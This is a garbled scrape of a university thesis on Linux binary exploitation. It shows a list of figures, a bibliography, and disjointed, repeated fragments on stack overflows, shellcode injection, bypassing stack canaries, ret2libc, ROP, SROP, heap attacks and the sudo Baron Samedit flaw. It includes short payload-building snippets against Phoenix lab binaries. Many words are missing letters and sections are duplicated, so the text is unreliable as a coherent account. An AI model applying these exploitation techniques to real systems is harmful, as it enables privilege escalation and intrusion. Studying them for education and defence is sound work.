4.1 ret2libc stack layout . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 19

4.2 libc base address . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 20
4.3 system oset from libc base address . . . . . . . . . . . . . . . . . . . . . . . 20
4.4 "/bin/sh" string oset from libc base address . . . . . . . . . . . . . . . . . . 20
4.5 ret2libc exploit . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 21
4.6 ROP chain . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 22
4.7 ROP gadget pop rdi; ret . . . . . . . . . . . . . . . . . . . . . . . . . . . . 22
4.8 NOP gadget . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 22
4.9 Stack layout for example . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 23
4.10 libc base address at runtime . . . . . . . . . . . . . . . . . . . . . . . . . . . . 23
4.11 system oset from libc base address . . . . . . . . . . . . . . . . . . . . . . . 23
4.12 "/bin/sh" oset from libc base address . . . . . . . . . . . . . . . . . . . . . 23
4.13 Successful exploitation of the rop chain . . . . . . . . . . . . . . . . . . . . . . 24
4.14 Stack layout for a stack pivoting attack . . . . . . . . . . . . . . . . . . . . . 24
4.15 leave gadget . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 25
4.16 Stack pivoting example: instruction sequence . . . . . . . . . . . . . . . . . . 25
4.17 esp points to buffer . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 26
59
60 LIST OF FIGURES
4.18 Succesful exploitation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 26

4.19 __dl_runtime_resolve execution path . . . . . . . . . . . . . . . . . . . . . 28
4.20 Addresses of the most important tables for the exploit . . . . . . . . . . . . . 29
4.21 .data and .bss segments of the process . . . . . . . . . . . . . . . . . . . . . 30
4.22 Mapped segments of the process . . . . . . . . . . . . . . . . . . . . . . . . . 30
4.23 Osets from the tables to the second buer . . . . . . . . . . . . . . . . . . . 30
4.24 Bytes of the exploit . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 32
4.25 Successful exploitation of an ret2dlresolve attack . . . . . . . . . . . . . . . . 32
4.26 Layout of a SROP exploit in Linux x86_64[5] . . . . . . . . . . . . . . . . . . 33
4.27 SROP gadgets . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 34
4.28 SROP payload . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 35
4.29 Successful exploitation of an SROP exploit . . . . . . . . . . . . . . . . . . . 36
5.1 Allocated chunk structure . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 38

5.2 Freed chunk structure . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 38
5.3 Tcache structure . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 38
5.4 Heap overow . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 39
5.5 heap-one@phoenix . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 39
5.6 heap-one solved . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 40
5.7 heap-two@Phoenix . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 41
5.8 Double free vulnerability . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 41
5.9 User controlled chunk . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 43
7.1 Out-of-bounds access . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 50

7.2 Unpatched sudo behaviour . . . . . . . . . . . . . . . . . . . . . . . . . . . . 51
7.3 Patched sudo behaviour . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 51
7.4 Relevant calls in sudo . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 52
7.5 NSS data structures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 53
7.6 Intended heap layout . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 54
7.7 Printing the heap layout while bruteforcing . . . . . . . . . . . . . . . . . . . 55
7.8 Overow . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 55
7.9 Successful exploit . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 56
List of Tables
3.1 Common format conversion speciers table . . . . . . . . . . . . . . . . . . . 13
61
62 LIST OF TABLES
Bibliography
[1] Aleph1. Smashing The Stack For Fun And Prot. url: http://phrack.org/issues/
49/14.html. (accessed: 10/4/2021).
[2] Anonymous. Once upon a free. url: http : / / phrack . org / issues / 57 / 9 . html.
(accessed: 3/5/2021).
[3] Code Arcana. Introduction to format string exploits. url: https://codearcana.com/

posts/2013/05/02/introduction-to-format-string-exploits.html. (accessed:
28/3/2021).
[4] Atum. Intro to Windows Exploit Techniques for Linux PWNers. url: https://blog.
pwnhub.cn/download/01/WinPWN.pdf. (accessed: 11/5/2021).
[5] Eik Bosman and Herbert Bos. Signal-return oriented programming. url: https://
www.cs.vu.nl/~herbertb/papers/srop_sp14.pdf. (accessed: 8/5/2021).
[6] Intel Corporation. Intel 64 and IA-32 Architectures Software Developer's Manual Vol-
ume 1: Basic Architecture. Intel Corporation, 2020.
[7] D3v17. Ret2dl_resolve x64. url: https : / / syst3mfailure . io / ret2dl _ resolve.
(accessed 31/05/2021).
[8] Robin David. checksec. url: https://github.com/RobinDavid/checksec/blob/

master/checksec.sh. (accessed: 24/3/2021).
[9] Peter Van Eeckhoutte. Exploit writing tutorial part 6 : Bypassing Stack Cookies, Safe-
Seh, SEHOP, HW DEP and ASLR. url: https://www.corelan.be/index.php/
2009/09/21/exploit- writing- tutorial- part- 6- bypassing- stack- cookies-
safeseh-hw-dep-and-aslr/. (accessed: 6/4/2021).
[10] Patrice Godefroid. A brief introduction to fuzzing and why it's an important tool for
developers. url: https://www.microsoft.com/en- us/research/blog/a- brief-
introduction-to-fuzzing-and-why-its-an-important-tool-for-developers/.
(accesses: 31/05/2021).
[11] Google. AFL (american fuzzy lop). url: https : / / afl - 1 . readthedocs . io / en /
latest/index.html. (accessed: 17/3/2021).
[12] Google. Coverage guided vs blackbox fuzzing. url: https : / / google . github . io /
clusterfuzz/reference/coverage-guided-vs-blackbox/. (accessed: 2/6/2021).
[13] ir0nstone. Binary explotation notes. url: https://ir0nstone.gitbook.io/notes/.
(accessed: 31/3/2021).
[14] Réka Kováca. Structure-aware fuzzing. url: https://meetingcpp.com/mcpp/slides/

2018/Structured%20fuzzing.pdf. (accessed: 2/06/2021).
63
64 BIBLIOGRAPHY
[15] OSIRIS Lab. Stack canaries. url: https://ctf101.org/binary- exploitation/

stack-canaries. (accessed: 6/3/2021).
[16] MallocInternals. url: https : / / sourceware . org / glibc / wiki / MallocInternals.

(accessed: 2/4/2021).
[17] Dr. Hector Marco-Gisbert and Dr. Ismael Ripoll-Ripoll. return-to-csu: A New Method
toBypass 64-bit Linux ASLR. url: https :// i.blackhat.com /briefings/asia /
2018/asia-18-Marco-return-to-csu-a-new-method-to-bypass-the-64-bit-
Linux-ASLR-wp.pdf. (accessed: 9/5/2021).
[18] MaXX. Vudo malloc tricks. url: http://phrack.org/issues/57/8.html#article.
(accessed: 10/4/2021).
[19] Mitre. CVE-2021-3156. url: https : / / cve . mitre . org / cgi - bin / cvename . cgi ?
name=CVE-2021-3156. (accessed: 12/05/2021).
[20] Mitre. CWE-193: O-by-one Error. url: https://cwe.mitre.org/data/definitions/

193.html. (accessed: 12/05/2021).
[21] Nergal. Advanced return-into-lib(c) exploits [PaX case study]. url: http://phrack.
org/issues/58/4.html. (accessed: 9/5/2021).
[22] NIST. CVE-2021-3156 Detail. url: https://nvd.nist.gov/vuln/detail/CVE-

2021-3156. (accessed: 12/05/2021).
[23] osdev.org. Stack smashing protector. url: https://wiki.osdev.org/Stack_Smashing_

Protector. (accessed: 6/3/2021).
[24] Phantasmal Phantasmagorial. Malloc Mallecarum. url: https://packetstormsecurity.

com/files/40638/MallocMaleficarum.txt.html. (accessed: 3/5/2021).
[25] Qualys. CVE-2021-3156: Heap-Based Buer Overow in Sudo (Baron Samedit). url:
https : / / blog . qualys . com / vulnerabilities - research / 2021 / 01 / 26 / cve -
2021- 3156- heap- based- bufferoverflow- in- sudo- baron- samedit. (accessed:
17/3/2021).
[26] Ungureanu Ricardo. 0ctf babystack with return-to dl-resolve. url: https : / / gist .
github.com/ricardo2197/8c7f6f5b8950ed6771c1cd3a116f7e62. (accesses: 9/5/2021).
[27] Ryan Roemer et al. Return-Oriented Programming: Systems, Languages, and Appli-
cations. url: https://hovav.net/ucsd/dist/rop.pdf. (accessed: 17/3/2021).
[28] Fundación Sadosky. Guía de exploits. url: https://fundacion- sadosky.github.
io/guia-escritura-exploits/format-string/5-format-string.html. (accessed:
24/3/2021).
[29] Sayfer.io. Fuzzing Part 1: The Theory. url: https://sayfer.io/blog/fuzzing-

part-1-the-theory/. (accessed: 2/06/2021).
[30] SCUT and TESO Security Group. Exploiting Format String vulnerabilities. url: https:
/ / crypto . stanford . edu / cs155old / cs155 - spring08 / papers / formatstring -
1.2.pdf. (accessed: 17/3/2021).
[31] Qualys Research Team. Baron Samedit: Heap-based buer overow in Sudo (CVE-
2021-3156). url: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-
samedit-heap-based-overflow-sudo.txt. (accessed: 14/05/2021).
[32] Worawit Wangwarunyoo. Exploit Writeup for CVE-2021-3156 (Sudo Baron Samedit).
url: https://datafarm-cybersecurity.medium.com/exploit-writeup-for-cve-
2021-3156-sudo-baron-samedit-7a9a4282cb31. (accessed: 14/05/2021).
BIBLIOGRAPHY 65
[33] Jyh-haw Yeh. Format String Vulnerability. url: http : / / cs . boisestate . edu /
~jhyeh/cs546/Format-String-Lecture.pdf. (accessed: 28/3/2021).
[34] Andreas Zeller et al. The Fuzzing Book. In: The Fuzzing Book. Retrieved 2019-09-09
16:42:54+02:00. Saarland University, 2019. url: https://www.fuzzingbook.org/.
[35] Fengwei Zhang. Format-String Vulnerability. url: https://fengweiz.github.io/
19fa-cs315/slides/lab10-slides-format-string.pdf. (accessed: 28/3/2021).

Bufferoverflow

Uploaded by

Bufferoverflow

Uploaded by

Treball nal de grau

GRAU EN ENGINYERIA INFORMÀTICA

Autor: Oriol Ornaque Blázquez

Director: Raúl Roca Cánovas

Barcelona, 20 de juny de 2021

2 Stack overow countermeasures 9

A CVEs and CWEs 57

1.1 The stack

stack do_something_a() do_something_b()

Figure 1.1: Simplied stack timeline

1.1.1 Stack frame

3. Locals of the subroutine.

1 void foo( int arg ) 1 foo: 0x00...00

6 int main() 6 foo's stack frame

Figure 1.2: Standard C 32-bit calling convention stack layout

1.1.2 Overowing the stack

Can we modify the return address? Indeed.

Figure 1.3: Buer on the stack

1.2 Basic overow

3 printf("Congratulations, you've finished " LEVELNAME " :-) Well done!\n");

Figure 1.4: Stack4@Phoenix

Figure 1.5: man 3 gets: Bugs section

We need to supply gets with the following data:

1. 64 bytes of junk for the buer

2. 8 bytes of junk for the ret local variable

3. 8 bytes of junk for the stack alignment padding[6]

4. 8 bytes of junk for the saved base pointer

5. 8 bytes with the address of complete_level for the return address

To nd the address of complete_level we can use a debugger like gdb.

Listing 1.1: stack4_exploit.py

1 exploit = "\x41" * 64 # for the buffer

And we are done.

Figure 1.6: Exploiting Stack4

Some last thoughts on why that exploit was possible:

 We knew in advance the address where complete_level was loaded

 No bounds checking was performed on the user input

 There was nothing checking the integrity of the stack frame

1.3 Shellcode injection

2. 128 − len(shellcode) bytes of NOPs to ll the buer

3. 8 bytes of NOPs for the saved base pointer

Debugged process Shellcode gdb env

Normal process Shellcode

0x...570 − 0x...520 = 0x50

0x...490 + 0x50 = 0x...4e0

Listing 1.2: stack5_exploit.py

3 exploit += "\x90" * (128 - len(exploit))

Some thoughts on why this exploit was possible:

 We knew in advance the address of the buer on the stack.

 No bounds checking was performed on the user input.

 There was nothing checking the integrity of the stack frame.

 We could execute instructions stored on the stack.

Stack overow countermeasures

2.1 Stack canaries

buer canary saved bp saved ip

Figure 2.1: Stack canary

Figure 2.2: foo function without and with stack canary

Figure 2.3: man gcc

2.1.1 Check for canaries

1 readelf -s a.out | grep -q '__stack_chk_fail'

2.1.2 Bypassing stack canaries

Listing 2.1: Pseudocode for bruteforcing a canary in a fork program

5 for(int j = 0; j < 256; ++j)

This algorithm reduces the entropy space from 256STACK_CANARY_WIDTH to 256×STACK_CANARY_WIDTH.

Bypass using Exception Handling

Replace the canary value

2.2.1 Check for NX

1 readelf -W -l a.out | grep 'GNU_STACK'

2.3.1 Check for ASLR/PIE

To check if a binary has been compiled with ASLR support[8]:

1 readelf -h a.out | grep "DYN"

Additionally, in Linux systems we can use the LD_TRACE_LOADED_OBJECTS environment vari-

3.1 Format functions

 printf (fprintf, sprintf, vsnprintf, ...)

 scanf (sscanf, fscanf, vfscanf, ...)

Conversion specier Meaning

Table 3.1: Common format conversion speciers table

Treball nal de grau

2 Stack overow countermeasures 9

Figure 1.1: Simplied stack timeline

1.1.2 Overowing the stack

Figure 1.3: Buer on the stack

1.2 Basic overow

1. 64 bytes of junk for the buer

To nd the address of complete_level we can use a debugger like gdb.

We knew in advance the address where complete_level was loaded

No bounds checking was performed on the user input

There was nothing checking the integrity of the stack frame

2. 128 − len(shellcode) bytes of NOPs to ll the buer

We knew in advance the address of the buer on the stack.

No bounds checking was performed on the user input.

There was nothing checking the integrity of the stack frame.

We could execute instructions stored on the stack.

Stack overow countermeasures

buer canary saved bp saved ip

printf (fprintf, sprintf, vsnprintf, ...)

scanf (sscanf, fscanf, vfscanf, ...)

Conversion specier Meaning

Table 3.1: Common format conversion speciers table

Figure 3.4: Address of s3cr3t on the input buer

Figure 4.3: system oset from libc base address

Figure 4.4: "/bin/sh" string oset from libc base address

Figure 4.11: system oset from libc base address

Figure 4.12: "/bin/sh" oset from libc base address

oset on the STRTAB structure.

Figure 4.23: Osets from the tables to the second buer